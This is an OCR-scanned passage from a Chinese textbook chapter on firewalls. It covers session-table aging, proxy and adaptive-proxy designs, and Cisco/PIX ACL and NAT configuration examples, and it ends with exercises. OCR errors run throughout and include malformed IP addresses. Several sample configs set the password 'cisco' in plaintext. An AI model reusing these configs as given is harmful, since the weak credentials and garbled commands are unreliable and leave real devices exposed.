是 看 成 一 个 个 孤立 的 包 ， 相 比 传统 的 包 过 滤 方 式 ， 状 态 防火 墙 大 大 提高 了 安全 性 和 处 理性 
能 。 另 外 ， 状 态 检测 还 可 识别 应 用 层 信息 ， 可 以 把 一 个 新 的 连接 和 一 个 已 经 存在 的 连接 进 
行 关联 ， 这 使 得 它 很 适合 处 理 一 些 动态 端口 的 应 用 (如 FTP 等 )。 


2. 状态 会 话 表 的 维持 时 间 


由 于 状态 防火 墙 利用 会 话 表 来 保持 对 连接 状态 的 跟踪 ， 那 么 一 个 连接 在 会 话 表 中 的 生 
存 时 间 必 须 至 少 维持 到 该 连接 的 结束 ， 如 果 表 项 过 早 在 会 话 表 中 被 删除 ， 则 正常 的 会 话 就 
会 被 中 断 ， 如 果 表 项 在 连接 拆除 后 在 会 话 表 中 仍 存在 较 长 时 间 ， 则 会 过 度 占用 防火 墙 的 会 
话 连接 数 。 

一 般 防 火 墙 会 根据 源 地 址 、 目 的 地 址 、 端 口号 及 序列 号 等 一 些 标志 信息 区 分 数据 包 是 
和 否 同属 一 个 会 话 。 当 防火 墙 将 一 个 带 有 SYN 标志 的 请 求 连接 数据 包 信息 加 入 会 话 表 时 ， 
会 设置 一 个 SYN 会 话 老 化 时 间 ， 默 认为 60 秒 ; 然后 防火 墙 会 期 待 一 个 返回 的 确认 连接 数 
据 包 ， 当 接收 到 该 应 答 包 的 时 候 ， 防 火 墙 会 认为 三 次 握手 建立 成 功 ， 防 火 墙 会 将 会 话 连接 
的 老化 时 间 设 定 为 默认 的 1800 秘 (不 同 防火 墙 该 值 的 设 定 也 不 同 )， 当 然 这 个 老化 时 间 也 
可 以 由 用 户 自行 设 定 。 不 过 针对 不 同 的 连接 类 型 ， 这 个 值 也 可 以 进行 不 同 的 设 定 。 例 如 长 
连接 类 型 的 应 用 ， 例 如 telnet、FTP 等 ， 可 将 该 值 设 定 长 一 些 ， 否 则 可 能 会 中 断 正 常 的 会 
话 连接 ， 而 对 于 短 连接 类 型 的 应 用 ， 应 将 该 值 设 定 短 一 些 ， 否 则 会 过 度 占 用 系统 资源 ， 造 
成 会 话 表 过 长 ， 甚 至 溢出 。 

表 7-2 列 出 了 一 些 数据 包 类 型 在 会 话 表 中 老化 时 间 的 建议 值 。 


表 7-2 一 些 常见 连接 类 型 在 防火 墙 会 话 表 中 老化 时 间 的 建议 值 


连接 类 型 
icmp-closed 状态 老化 时 间 
icmp-connected 状态 老化 时 间 
icmp-started 状态 老化 时 间 
Tawip-closed 状态 老化 时 间 
Tawip-connected 状态 老化 时 间 


默认 老化 值 / 秒 
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续 表 
连接 类 型 默认 老化 值 / 秒 

rawip-started 状态 老化 时 间 300 

Tawip-established 状态 老化 时 间 300 

udp-closed 状态 老化 时 间 10 

udp-connected 状态 老化 时 间 30 

udp-started 状态 老化 时 间 60 

udp-established 状态 老化 时 间 600 

tcp-closed 状态 老化 时 间 10 

tcp-close-wait 状态 老化 时 间 60 

tcp-established 状态 老化 时 间 1800 

tcp-fin-wait 状态 老化 时 间 60 

tcp-last-ack 状态 老化 时 间 30 

tcp-syn-receive 状态 老化 时 间 10 

tcp-syn-sent 状态 老化 时 间 10 

tcp-time-wait 状态 老化 时 间 10 


3. 状态 会 话 表 项 的 拆除 


当 连 接 被 通信 双方 关闭 后 ， 防 火 墙 会 话 表 中 的 连接 表 项 并 不 会 立即 被 删除 ， 直 到 老化 
时 间 到 来 时 ， 才 会 在 会 话 表 中 拆除 该 连接 。 这 样 做 是 为 了 会 话 表 项 的 复 用 ， 例 如 当 通 信 双 
方 关闭 一 个 连接 后 马上 拆除 会 话 表 项 时 ， 此 时 双方 又 很 快 开启 了 一 个 新 的 连接 ， 这 时 防火 
墙 就 要 为 这 个 新 的 连接 重建 会 话 表 ， 这 样 就 降低 了 防火 墙 的 处 理性 能 。 因 此 当 一 个 连接 关 
闭 后 ， 防 火 墙 会 话 表 中 的 连接 仍 会 被 维护 一 段 时 间 。 当 防火 墙 检测 到 一 个 带 有 FIN 或 
RST 数据 包 与 会 话 表 中 某 个 表 项 属于 同一 连接 时 ， 会 减少 连接 的 老化 时 间 ， 例 如 从 1800 
秒 减 少 到 50 秒 ， 如 果 在 这 个 时 间 内 没有 数据 包 交换 ， 这 个 状态 表 项 将 会 在 会 话 表 中 被 删 
除 。 


7.3.3 ”应 用 层 代理 网 关 技 术 


由 于 早期 包 过 滤 技术 的 缺陷 ， 在 它 出 现 后 不 久 ， 许 多 安全 机 构 ， 如 DARPQA、 美 国 
国防 部 研究 开发 中 心 等 就 开始 寻找 一 种 更 好 的 安全 方案 ， 即 应 用 层 代理 网 关 技 术 。 这 种 技 
术 的 核心 思想 是 不 允许 透 过 防火 墙 直接 建立 连接 ， 所 有 进出 的 数据 都 要 在 网 络 的 最 高 层 协 
议 组 中 进行 检查 。 这 种 应 用 代理 防火 墙 模式 提供 了 很 高 的 安全 控制 ， 因 为 它 通过 在 协议 组 
最 高 层 的 检测 而 使 全 部 应 用 级 了 解 正在 进行 的 连接 。 并 且 由 于 它 在 应 用 层 是 完全 可 见 的 ， 
所 以 应 用 代理 防火 墙 可 以 很 容易 地 预先 看 到 每 一 个 正 试图 连接 的 细节 ， 从 而 可 以 扩展 出 更 
多 的 安全 检查 方式 ， 例 如 这 种 防火 墙 可 以 很 容易 地 辨别 出 一 些 命令 ， 如 FTP 中 的 “put” 
和 “get”， 并 为 每 个 命令 提供 相应 的 安全 策略 规则 。 

应 用 代理 防火 墙 通过 一 个 内 置 的 代理 功能 ， 将 外 部 网 络 和 内 部 网 络 分 开 ， 并 使 得 外 网 
的 电脑 黑客 更 难于 对 防火 墙 内 部 的 网 络 系统 进行 攻击 。 当 前 主流 防火 墙 采用 的 应 用 代理 技 
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术 是 一 种 自 适应 的 代理 技术 ， 它 融合 了 前 几 代 防火 墙 应 用 技术 的 优点 ， 具 有 快速 和 安全 的 
双重 优点 。 


1. 自 适应 代理 技术 的 结构 原理 


自 适应 代理 技术 结合 了 传统 应 用 代理 网 关 技 术 和 灵活 地 动态 包 过 滤 技 术 ， 在 防火 墙 管 
理 员 设 定 的 安全 策略 基础 上 来 控制 流 经 防火 墙 的 数据 包 。 虽 然 自 适应 代理 技术 也 采用 了 包 
过 滤 技术 ， 但 是 仍 由 代理 网 关 决 定 所 有 的 安全 措施 。 如 图 7-20 所 示 ， 自 适应 代理 防火 墙 
的 动态 包 过 滤 技 术 人 允许 代理 网 关 对 新 的 连接 进行 检测 ， 并 将 连接 信息 告知 动态 包 过 滤 该 如 
何 对 该 连接 进行 操作 ， 如 何在 应 用 层 上 选择 包括 允许 或 拒绝 等 功能 。 动 态 包 过 滤 技 术 通 过 
代理 网 关 对 每 个 新 的 连接 进行 调整 。 另 外 ， 它 允许 代理 网 关 对 未 经 检测 而 自动 转 接 的 连接 
进行 特殊 化 处 理 : 即 当 一 个 连接 确立 时 ， 动 态 包 过 滤 必须 确认 该 连接 的 安全 性 ， 并 确定 将 
来 在 改变 连接 协议 或 建立 了 新 的 连接 后 不 会 遭 到 破坏 。 在 连接 确立 之 后 ， 它 必须 通知 代理 


网 关 并 提供 全 部 的 连接 信息 。 
a | | 


dd 


Packet Filter 


攻 Static Packet Filter 有 


< 人 > static Rule Base 全 Dynamic Rule Base 
Defned by proxy control and connection state 


图 7-20 自 适应 代理 防火 墙 结构 示意 图 

在 自 适应 代理 与 动态 包 过 滤器 之 间 存 在 一 个 控制 通道 。 当 需要 对 防火 墙 进行 配置 时 ， 
管理 员 仅 需 要 将 服务 类 型 、 安 全 级 别 等 信息 通过 相应 Proxy 管理 界面 进行 设置 就 可 以 了 。 
随后 自 适 应 代理 网 关 就 可 以 根据 用 户 的 配置 信息 ， 决 定 是 使 用 代理 服务 从 应 用 层 代理 请 求 
还 是 从 网 络 层 转 发 数据 包 。 如 果 是 后 者 ， 它 将 动态 地 给 包 过 滤器 增 减 过 滤 规则 ， 满 足 用 户 
对 速度 和 安全 性 的 双重 要 求 。 

2. 结合 了 动态 包 过 滤 的 自 适 应 代理 技术 的 应 用 

使 用 带 有 动态 包 过 滤 技术 的 自 适 应 代理 防火 墙 ， 当 建立 一 个 连接 时 ， 动 态 包 过 滤器 通 
知 代理 服务 器 并 告知 其 包含 了 源 地 址 及 目的 地 址 的 连接 数据 。 为 了 检测 一 个 特殊 的 连接 ， 
代理 服务 器 运用 了 结构 化 信息 ， 当 连接 通过 时 必须 由 防火 墙 管理 员 预 设 的 策略 来 决定 是 否 
同意 使 用 其 应 用 层 信息 。 如 果 防 火 墙 管理 员 认 为 该 连接 具有 较 低 的 危险 性 ， 则 会 为 它 赋予 
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较 高 的 权限 。 这 样 动态 包 过 滤 就 为 特殊 的 源 和 目的 地 址 的 连接 建立 了 一 个 会 话 规则 ， 之 后 
在 这 两 个 端点 间 传递 的 包 将 不 通过 代理 服务 器 的 检测 就 可 以 自由 地 传递 了 。 而 一 旦 连接 终 
止 ， 会 话 规则 将 随 之 改变 ， 代 理 服 务 器 就 会 作出 相应 的 动作 。 如 果 是 由 应 用 层 做 出 的 连接 
终止 决定 ， 动 态 包 过 滤 就 会 发 送 包 到 协议 栈 中 ， 这 样 监视 它们 的 应 用 代理 服务 器 就 会 接收 
到 这 一 信息 。 整 个 连接 过 程 就 是 在 这 种 既定 的 代理 方式 下 进行 的 ， 代 理 服务 器 就 像 一 个 客 
户 机 一 样 工作 ， 并 将 新 建立 的 连接 转 接 到 最 终 节点 上 。 

自 适 应 代理 技术 的 灵活 性 使 它 在 防火 墙 和 其 他 安全 产品 的 综合 应 用 中 能 很 好 地 提高 安 
全 性 能 。 例 如 当 一 个 入 侵 检测 系统 发 现 一 个 黑客 攻击 时 ， 会 通知 防火 墙 ， 而 自 适 应 防火 墙 
马上 就 会 自动 确认 这 一 攻击 行为 并 开始 防范 。 


7.3.4 防火 墙 安全 操作 系统 


由 于 防火 墙 自 身 应 具有 很 好 地 抗 攻击 性 ， 因 此 应 首先 保证 防火 墙 自身 系统 的 安全 性 。 
同时 现代 防火 墙 操作 系统 一 般 采 用 开放 性 的 系统 架构 及 模块 化 设计 ， 以 便 有 利于 系统 的 扩 
展 性 和 多 种 安全 机 制 的 适应 性 。 

目前 防火 墙 安 全 操作 系统 的 实现 方式 和 软 硬 件 架构 都 有 很 大 差异 ， 但 就 安全 性 、 可 靠 
性 和 扩展 性 来 说 ， 防 火 墙 的 应 用 体系 结构 一 般 可 分 为 应 用 层 、 内 核 层 和 硬件 层 ， 如 图 7-21 
所 示 。 


应 用 层 (wai ) (awn) (eeuu)| 其 他 应 用 组 件 | 


硬件 层 | 防火 墙 硬件 接口 ] 


图 7-21 防火 墙 应 用 体系 结构 示意 图 


为 了 防火 墙 系统 的 安全 性 考虑 ， 一 般 各 厂商 的 防火 墙 操作 系统 都 是 采用 各 厂商 专用 的 
安全 IOS， 综 合 各 种 防火 墙 操作 系统 的 特点 ， 主 要 有 以 下 几 个 方面 。 

1) ”网 络 方面 

防火 墙 一 般 均 为 网 关 型 设备 ， 通 常 部 署 在 各 个 网 络 域 (包含 主机 ) 的 边界 处 ， 因 此 其 网 
络 功 能 的 实现 是 必需 的 ， 主 要 包括 以 下 内 容 : 

@ ”接口 :主要 包括 物理 接口 和 子 接口 ， 支 持 包括 接口 属性 和 IP 地 址 的 设置 等 。 
二 层 网 络 : 应 具有 VLAN、ARP 和 MAC 地 址 表 学 习 等 内 容 。 
三 层 路 由 : 支持 静态 路 由 、 动 态 路 由 及 各 种 路 由 的 设置 方法 。 
DHCP: 支持 DHCP 服务 器 、DHCP 客户 端 和 DHCP 中 继 等 功能 。 
SNMP: 支持 SNMP 代理 协议 ， 可 以 设置 trap 主机 、SNMP 管理 主机 等 功能 。 
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NAT: 支持 NAT 和 PAT 地 址 转换 功能 。 
流量 管理 : 支持 QOS 流量 管理 功能 ， 支 持 链 路 流量 控制 和 一 般 的 流量 统计 
功能 。 
2) ”管理 方面 
现代 防火 墙 的 系统 管理 主要 包括 : 显示 和 查询 基本 信息 、 运 行 状 态 等 信息 ， 支持 系统 
参数 、 运 行 配置 、 配 置 维护 等 功能 的 设置 ， 具 有 图 形 管理 和 显示 等 功能 ， 支 持 参数 的 还 原 
和 系统 升级 能 功能 。 
3) ”资源 配置 策略 
现代 防火 墙 可 以 管理 和 控制 的 资源 非常 多 ， 例 如 访问 控制 策略 、 地 址 转换 策略 、 安 全 
区 域 策 略 、 负 载 均 衡 策略 、 时 间 服 务 策 略 以 及 认证 管理 策略 等 ， 对 各 种 类 型 资源 的 策略 配 
置 是 管理 员 对 防火 墙 进行 配置 的 首要 工作 之 一 。 总 之 ， 现 代 防 火 墙 可 以 结合 对 多 种 网 络 资 
源 和 系统 资源 的 管理 和 控制 ， 可 以 实现 一 个 多 层次 的 安全 防御 策略 。 
4) “用 户 认 证 功能 
防火 墙 应 保证 效 、 全 面 的 用 户 及 设备 身份 认证 机 制 ， 以 保障 用 户 与 设备 之 间 的 访问 安 
全 性 和 合法 性 。 防 火 墙 支持 的 认证 方式 和 协议 主要 包括 : 本 地 认证 、RADIUS 认证 、AAA 
认证 、SecurID 认证 以 及 LDAP 认证 等 方式 。 用 户 认 证 可 以 实现 客户 端 用 户 的 身份 识别 、 
授权 以 及 细 粒 度 访问 控制 权限 。 要 实现 用 户 认证 的 基本 前 提 是 : 首先 要 在 相关 接口 开启 认 
证 服务 ， 并 且 根 据 认 证 方式 的 不 同 设置 认证 服务 器 的 参数 ， 而 后 在 本 地 数据 库 中 添加 认证 
用 户 信息 ， 最 后 为 本 地 或 第 三 方 认证 用 户 配置 访问 控制 的 权限 。 
5) ”防火 墙 功能 
管理 员 可 以 通过 地 址 转换 策略 和 应 用 代理 网 关 策 略 控制 内 外 网 之 间 的 访问 ， 如 配置 防 
火 墙 的 安全 域 ， 限 制 外 网 用 户 对 内 网 服务 器 的 直接 访问 以 及 内 网 用 户 使 用 私有 地 址 对 外 网 
的 访问 ， 通 过 包 过 滤 策 略 实现 简单 的 二 、 三 层 访问 控制 ， 通 过 访问 控制 规则 实现 灵活 、 强 
大 的 三 到 七 层 的 访问 控制 ， 用 户 还 可 以 设置 深度 过 滤 策 略 针 对 应 用 层 的 内 容 进行 更 细 颗 粒 
度 的 访问 控制 ， 以 及 设置 他 地 址 和 MAC 地 址 绑 定 策略 等 。 
同时 ， 大 多 数 现代 防火 墙 系统 都 支持 基于 应 用 层 的 内 容 过 滤 和 安全 内 容 检 测 技术 ， 内 
容 过 滤 实 现 技术 可 以 对 应 用 层 提 供 更 细 粒 度 的 访问 控制 ， 如 对 HTTP、FTP、SMTP、 
POP3、IMAP、TELNET、RSH， 各 种 即时 通讯 软件 如 MSN、QQ 等 ) 以 及 P2P 协议 (如 
BT、eMule 等 ) 的 应 用 和 访问 控制 。 完 全 内 容 检 测 技术 基于 早期 的 状态 检测 机 制 和 后 来 的 
深度 包 检测 技术 ， 但 状态 检测 只 检查 数据 包 的 包头 ， 深 度 包 检 测 可 对 数据 包 内 容 进行 检 
查 ， 而 完全 内 容 检测 技术 则 可 以 实时 将 网 络 层 数据 还 原 为 完整 的 应 用 层 对 象 ( 如 文件 、 网 
页 邮件 等 )， 并 对 这 些 完 整 内 容 进行 全 面 检查 ， 实 现 彻底 的 内 容 防 护 。 
6) 智能 检测 防护 技术 
目前 防火 墙 可 通过 内 置 检测 技术 或 嵌入 式 入 侵 检测 技术 实现 常见 攻击 的 检测 防护 功 
能 ， 这 些 攻击 包括 yn Flood、Smurf、Targa3、Syn Attack、ICMP flood、Ping of death、 
Ping Sweep、Land attack、Tear drop attack、 IP address sweep option、 Filter IP source route 
option、Syn fragments、No flags im TCP、ICMP 碎片 、 大 包 ICMP 攻击 、 不 明 协 议 攻 击 、 
IP 欺骗 、IP security options、JIP source route、IP record route 、IP bad options、 卫 碎片 、 端 
口 扫描 等 多 种 攻击 方式 ， 在 实现 攻击 检测 的 同时 ， 防 火 墙 还 可 有 效 地 阻止 这 些 攻击 对 系统 
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的 影响 ， 并 实现 与 其 他 安全 产品 的 联动 。 

7) ”高 可 用 性 

为 了 实现 防火 墙 的 高 可 用 性 和 安全 部 署 ， 避 免 单 点 故障 和 单 点 瓶颈 对 网 络 的 影响 ， 防 
火 墙 一 般 都 支持 包括 接口 联动 、 双 机 热 备 、 防 火 墙 集群 、 卫 探测 、 链 路 元 余 、 负 载 均衡 以 
及 日 志和 报警 等 功能 。 


7.4 典型 防火 墙 的 配置 


本 节 我 们 将 对 防火 墙 中 应 用 最 多 的 包 过 滤 访 问 控制 技术 、NAT 技术 、 定 义 安 全 级 别 
等 典型 配置 进行 一 个 简单 的 介绍 ， 由 于 各 个 厂商 的 防火 墙 设备 功能 和 命令 参数 的 不 同 ， 读 
者 在 具体 部 署 防火 墙 时 应 参照 具体 的 产品 手册 来 完成 防火 墙 的 实施 。 


1. 访问 控制 列表 (简称 ACL) 


访问 控制 列表 的 作用 是 通过 建立 ACL， 控 制 任何 卫 地 址 或 协议 对 网 络 的 访问 ， 并 能 
有 效 地 实现 对 一 些 敏感 资源 的 访问 。 访 问 控制 列表 具有 以 下 主要 特点 。 
@ 访问 控制 列表 需要 消耗 防火 墙 资源 。 由 于 访问 控制 列表 基于 包 过 滤 技 术 ， 因 此 数 
据 包 的 匹配 检查 需要 与 ACL 中 的 每 条 规则 进行 逐一 匹配 ， 目 前 大 多 数 防火 墙 都 
将 这 一 功能 集成 于 硬件 芯片 中 来 完成 ， 但 ACL 中 的 规则 条 数 要 占据 系统 资源 。 
e@ 提供 安全 控制 功能 。ACL 可 以 基于 主机 地 址 、 目 的 地 址 和 服务 类 型 来 允许 或 禁 
止 为 特定 的 用 户 提供 资源 ， 可 对 网 络 设计 中 特定 的 用 户 进行 控制 ， 也 可 根据 时 
间 等 元 素 实现 高 级 访问 控制 等 功能 。 
1) 访问 控制 列表 的 类 型 
访问 控制 列表 的 类 型 一 般 分 为 标准 ACL 和 扩展 ACL 两 种 ， 同 时 这 两 种 类 型 的 ACL 
也 是 我 们 最 常用 的 访问 控制 方式 。 
(1) 标准 访问 列表 
标准 ACL 只 能 对 源 地 址 进行 过 滤 ， 是 一 种 简单 、 直 接 的 数据 控制 手段 ， 它 通过 检查 
源 地 址 来 实施 对 网 络 资源 的 访问 控制 ， 针 对 的 通常 是 完整 的 协议 。 
(2) 扩展 访问 列表 
扩展 ACL 除了 基于 数据 包 源 地 址 的 过 滤 以 外 ， 还 能 够 对 协议 、 目 的 地 址 、 端 口号 进 
行 网 络 流量 过 滤 。 有 的 厂家 的 ACL 还 能 对 TCP flag 字段 进行 过 滤 ， 如 Cisco 等 ， 如 图 7-22 
所 示 。 


标准 访问 控制 列表 扩展 访问 列表 


7-22， 标 准 ACL 和 扩展 ACL 的 示意 图 
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2) ”访问 列表 的 典型 配置 
(1) 访问 列表 的 配置 要 点 
@ ”可 以 通过 访问 列表 的 编号 指明 使 用 何 种 类 型 的 访问 列表 ， 如 图 7-23 所 示 。 


Name (Cisco IOS 11.2. F and later) 


7-23 ”思科 访问 控制 列表 编号 与 ACL 类 型 对 应 图 


e@ 每 个 端口 、 每 个 方向 、 每 条 协议 只 能 对 应 一 条 访问 列表 。 

@ 访问 列表 的 内 容 决定 了 数据 的 控制 顺序 。 

@ 具有 严格 限制 条 件 的 语句 应 放 在 访问 列表 所 有 语句 的 最 上 面 。 

e@ ”在 访问 列表 的 最 后 有 一 条 隐 含 声明 : deny any 一 一 每 一 条 正确 的 访问 列表 都 至 少 
应 该 有 一 条 允许 语句 。 

e@ ” 先 创 建 访问 列表 ， 然 后 应 用 到 端口 上 。 


@ 访问 列表 不 能 过 滤 由 设备 本 身 产 生 的 数据 (这 样 就 不 会 影响 BPDU 或 Hello 等 
报 文 )。 

(2) 常用 ACL 的 配置 方法 

配置 ACL 的 一 般 步骤 : 

Step 1: 设置 访问 列表 测试 语句 的 参数 。 

access-list access-list-number { permit | deny } { test conditions } 

Step 2: 在 端口 上 应 用 访问 列表 。 

{ protocol } access-group access-list-number {in | out} ， 通 常 protocol 为 ip 

IP 访问 列表 的 标号 为 1-99 和 100-199 

@ 标准 访问 列表 的 配置 。 

定义 ACL 列表 : 

命令 : access-list access-list-number {permit|deny} source [mask] 

@ ”为 访问 列表 设置 参数 。 

e JP 标准 访问 列表 编号 1 到 99。 

e@ ”默认 的 通配符 掩 码 = 0.0.0.0。 

@ “no access-list access-list-number” 命 令 删 除 访问 列表 。 

@ ”access-list-number 唯一 标识 一 个 访问 列表 。 

在 接口 上 应 用 ACL: 


命令 : ip access-group access-list-number { in | out } 
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e ”在 端口 上 应 用 访问 列表 。 
e@ ”指明 是 进 方向 还 是 出 方向 。 
e 默认 = 出 方向 。 
@ “no ip access-group access-list-number” 命 令 在 端口 上 删除 访问 列表 。 


【 例 7-5】 通过 命令 行 访问 控制 列表 拒绝 在 一 个 主机 对 网 络 的 访问 ， 拓 扑 图 如 图 7-24 


所 示 。 
Non 
172.16.3.0 ( i 172.16.4.0 
六 | 172.16.4.13 
7-24 例 7-5 访问 控制 示例 的 拓扑 图 
配置 命令 如 下 : 


access-list 1 deny 172.16.4.13 0.0.0.0 // 访 问 控制 使 用 的 是 子 网 掩 码 的 反 码 

access-list 1 permit 0.0.0.0 255.255.255.255 

interface f0/1 

ip access-group 1 out 

@ 扩展 访问 列表 的 配置 

定义 ACL 列表 : 

命令 : access-list access-list-number { permit | deny } protocol source 
source-wildcard [operator port] destination destination-wildcard 


[ operator port ] [ established ] [log] 


为 访问 列表 设置 参数 。 

JP 标准 访问 列表 编号 100 以 上 。 

默认 的 通配符 掩 码 = 0.0.0.0。 
“no access-list access-list-number” 命 令 删除 访问 列表 。 

access-list-number 唯一 标识 一 个 访问 列表 。 

在 接口 上 应 用 ACL: 

命令 : ip access-group access-list-number { in | out } 

e 在 端口 上 应 用 访问 列表 。 

e@ ”指明 是 进 方向 还 是 出 方向 。 

e 默认 = 出 方向 。 

@ “noipaccess-group access-list-number” 命 令 在 端口 上 删除 访问 列表 。 
【 例 7-6】 通过 命令 行 访问 控制 列表 拒绝 子 网 172.16.4.0 对 172.16.3.0 的 FTP 访问 ， 


拓扑 图 如 图 7-25 所 示 。 
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172.16.3.0 @ 1721600 7 172.16.4.0 


172.16.4.13 


7-25 例 7-6 访问 控制 示例 的 拓扑 图 


配置 命令 如 下 : 
access-list 101 deny tcp 172.16.4.0 0.0.0.255 172.16.3.0 0.0.0.255 eq 21 
access-list 101 deny tcp 172.16.4.0 0.0.0.255 172.16.3.0 0.0.0.255 eq 20 


access-list 101 permit ip any any 
<implicit deny all> 

interface ethernet 0 

ip access-group 101 out 


注 : 在 扩展 访问 列表 中 ， 必 须 选 择 协议 字段 条 目 。 
【 例 7-7】 通过 命令 行 访问 控制 列表 限制 Telnet 的 登录 。 
配置 命令 如 下 : 


Pix(config)#access-list 1 permit 10.1.1.1 
Pix (config)#access-list 1 permit 10.1.1.2 
Pix (config)#line vty 0 4 

Pix (config-line)#access-class 1 in 


【 例 7-8】 通过 命令 行 访问 控制 列表 实现 对 关键 VLAN 的 保护 ， 只 允许 
10.25.25.0/24 对 vlan3 进行 fp 访问 ， 但 vlan3 可 以 访问 任何 主机 。 
配置 命令 如 下 : 


ip access-list extended protvlan3 
permit tcp any any established 
permit udp any any 
permit icmp any any echo-reply 
permit tcp 10.25.25.0 255.255.255.0 any eq 21 
permit tcp 10.25.25.0 255.255.255.0 any eq 20 
int vlan 3 
ip access-group protvlan3 out 


【 例 7-9】 通过 命令 行 访问 控制 列表 限制 HTTP 的 访问 。 
配置 命令 如 下 : 


PIX(config)# access-list 1 permit 192.168.10.7 
PIX(config)# ip http sever 

PIX(config)# ip http access-class 1 
PIX(config)# ip http authentication local 
PIX(config)# username student password cisco 
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2. NAT 地 址 映射 的 典型 配置 


1) “静态 地 址 转换 

当 内 网 数据 包 到 达 防 火 墙 时 ， 从 NAT 表 中 查找 相应 的 静态 转换 条 目 ， 检 索 出 对 应 的 
全 局 地 址 ， 并 蔡 换 数 据 包 中 的 源 地 址 (内 部 地 址 )， 而 当 外 部 数据 包 要 通过 防火 墙 的 时 候 ， 
目的 地 址 (全 局 地 址 ) 被 蔡 换 成 相应 的 内 部 地 址 。 例 如 : 

interface e0 // 连 接 内 部 网 的 接口 ， 使 用 ip nat inside 定义 


ip address 10.1.1.9 255.255.255.0 
ip nat inside 
1 


interface el // 连 接 外 部 公用 网 的 接口 ， 使 用 ip nat outside 定义 
ip address 172.16.2.1 255.255.255.0 


ip nat outside 
ip nat inside source static 10.1.1.2 192.168.2.3 // 将 内 部 地 址 转化 为 外 部 地 址 


2) ”动态 地 址 转换 

当 内 网 数据 包 到 达 防 火 墙 的 时 候 ， 首 先 检查 NAT 表 ， 看 是 否 已 经 建立 映射 。 如 果 没 
有 ， 则 动态 的 从 NAT 地 址 池 中 映射 一 个 全 局 地 址 ， 建 立 转换 条 目 ， 并 蔡 换 源 地 址 。 当 连 
接 终止 且 老 化 时 间 超 时 时 ， 转 换 条 目 被 删除 ， 全 局 地 址 被 NAT 池 回 收 。 例 如 : 


ip nat pool out 192.168.2.1 192.168.2.254 netmask 255.255.255.0 
ip nat inside source list 1 pool out 
// 定 义 外 部 地 址 为 NAT 池 "out"， 并 把 内 部 地 址 映射 到 外 部 地 址 
! 
interface e0 
ip address 10.1.1.9.255-.255.255.0 
ip nat inside 
! 
interface el 
ip address 172.16.2.1 255.255.255.0 
ip nat outside 


access-list 1 permit 10.1.1.0 0.0.0.255  // 用 标准 访问 列表 来 定义 内 部 地 址 


3) ”PAT 地 址 转换 配置 

当 数 据 包 到 达 防 火 墙 时 ， 首 先 检查 NAT 表 ， 看 是 否 已 经 建立 转换 条 目 。 如 果 没 有 ， 
并 且 已 经 存在 其 他 的 转换 条 目 ， 在 配置 了 端口 地 址 转换 的 情况 下 ， 则 会 再 次 使 用 此 全 局 地 
址 ， 并 保存 足够 信息 (P 地址 和 端口 号 )。PAT 地 址 转换 在 配置 时 ， 只 需要 在 “ip nat inside 
source list number pool name ”命令 后 面 加 上 “overload” 的 关键 字 就 行 了 。 

4) ”启用 TCP 负载 均衡 

当 内 部 节点 共享 一 个 IP 地 址 时 ， 在 外 部 看 来 就 是 一 台 虚 拟 的 主机 。 如 果 外 部 节点 要 
与 内 部 节点 建立 连接 ， 那 么 防火 墙 就 会 使 用 TCP 负载 均衡 的 功能 。 

当 防 火 墙 接收 到 外 部 请 求 时 ， 会 从 NAT 表 中 检查 上 一 次 的 转换 条 目 ， 并 为 本 次 连接 
分 配 下 面 一 个 条 目 进行 映射 ， 使 用 下 面 一 个 内 部 地 址 。 本 次 连接 结束 后 ， 下 一 次 的 外 部 请 
求 将 会 被 分 配 到 接 下 来 的 一 个 转换 条 目 。 


ip nat pool internal 10.1.1.1 10.1.1.3 prefix-length 23 type rotary 
// 关 键 字 type rotary 说 明 使 用 TcP 负载 平衡 
ip nat inside destination list 2 pool internal 


// 将 虚拟 主机 地 址 转化 成 由 "internal" 池 定义 的 内 部 地 址 
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interface el 

ip address 192.168.1.129 255.255.255.224 
ip nat outside 

interface e0 

ip address 10.1.1.254 255.255.255.0 

ip nat inside 


access-list 2 permit 10.1.1.127 // 用 访问 列表 定义 虚拟 主机 的 地 址 
3. 防火 墙 其 他 典型 配置 

1) “定义 接口 的 安全 级 别 (区 域 类 型 ) 

定义 外 网 接口 e0 的 安全 级 别 为 最 低 ， 内 网 接口 el 的 安全 级 别 为 最 高 。 


pix (config)# nameif ethernet1l outside security 0 
pix(config)# nameif ethernet0 inside security 100 


2) ”定义 接口 名 字 


nameif ethernet0 outside security0 
nameif ethernetl inside security100 
nameif ethernet2 dmz security50 


(3) 配置 接口 地 址 


ip address outside 218.106.185.82 
ip address inside 192.168.100.1 255.255.255.0 
ip address dmz 192.168.200.1 255.255.255.0 


4) ”常见 的 简单 用 户 安全 登录 配置 
(1) 配置 console 端口 密码 
pix(config)#line console 0 


pix(config-line)#password cisco 
pix(config-line)#login 


(2) 配置 特权 密码 
pix(config)#enable password cisco # 明 文 
pix(config)#enable secret cisco # 密 文 
(3) 配置 远程 登录 


pix(config)#access list 1 permit 10.1.1.1 
pix(config)#line aty 0 4 
pix(config-line)#password cisco # 明 文 
pix(config-line)#access-class 1 in 
pix(config-line)#login 


7.5 本 章 小 结 


本 章 讨论 了 防火 墙 的 基本 概念 和 发 展 历史 ， 以 及 当前 主流 防火 墙 应 用 的 一 些 关键 技 
术 。 通 过 本 章 的 学 习 ， 读 者 可 以 了 解 防火 墙 的 发 展 趋势 和 应 用 要 点 。 在 本 章 的 最 后 ， 为 读 
者 提供 了 一 些 防 火 墙 的 典型 配置 信息 ， 但 由 于 各 厂商 防火 墙 的 配置 差异 很 大 ， 即 便 是 同一 
家 的 防火 墙 产品 ， 由 于 IOS 版 本 的 不 同 ， 配 置 命 令 和 配置 方式 也 会 有 较 大 差异 ， 读 者 在 部 
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署 防火 墙 时 应 参考 具体 的 实施 环境 和 设备 手册 ， 进 行 合理 的 设置 ， 但 其 基本 原理 和 作用 是 
相似 的 ， 只 有 正确 地 理解 了 防火 墙 的 概念 和 应 用 要 点 ， 才 能 更 好 地 完成 防火 墙 的 部 署 。 


7.6 课 后 习题 


1. 填空 题 


(1) 防火 墙 在 实际 网 络 环境 中 部 署 时 ， 一 般 是 利用 防火 墙 将 网 络 分 为 三 个 安全 区 域 ， 
即 、 外 部 网 络 和 区 。 

(2) 防火 墙 集群 部 署 通常 有 两 种 技术 实现 方式 : 一 种 是 使 用 ， 另 一 种 是 使 
用 集群 Cluster 机 制 。 

(3) 应 用 代理 防火 墙 通过 一 个 内 置 的 ， 将 外 部 网 络 和 内 部 网 络 分 开 。 


2. 选择 题 


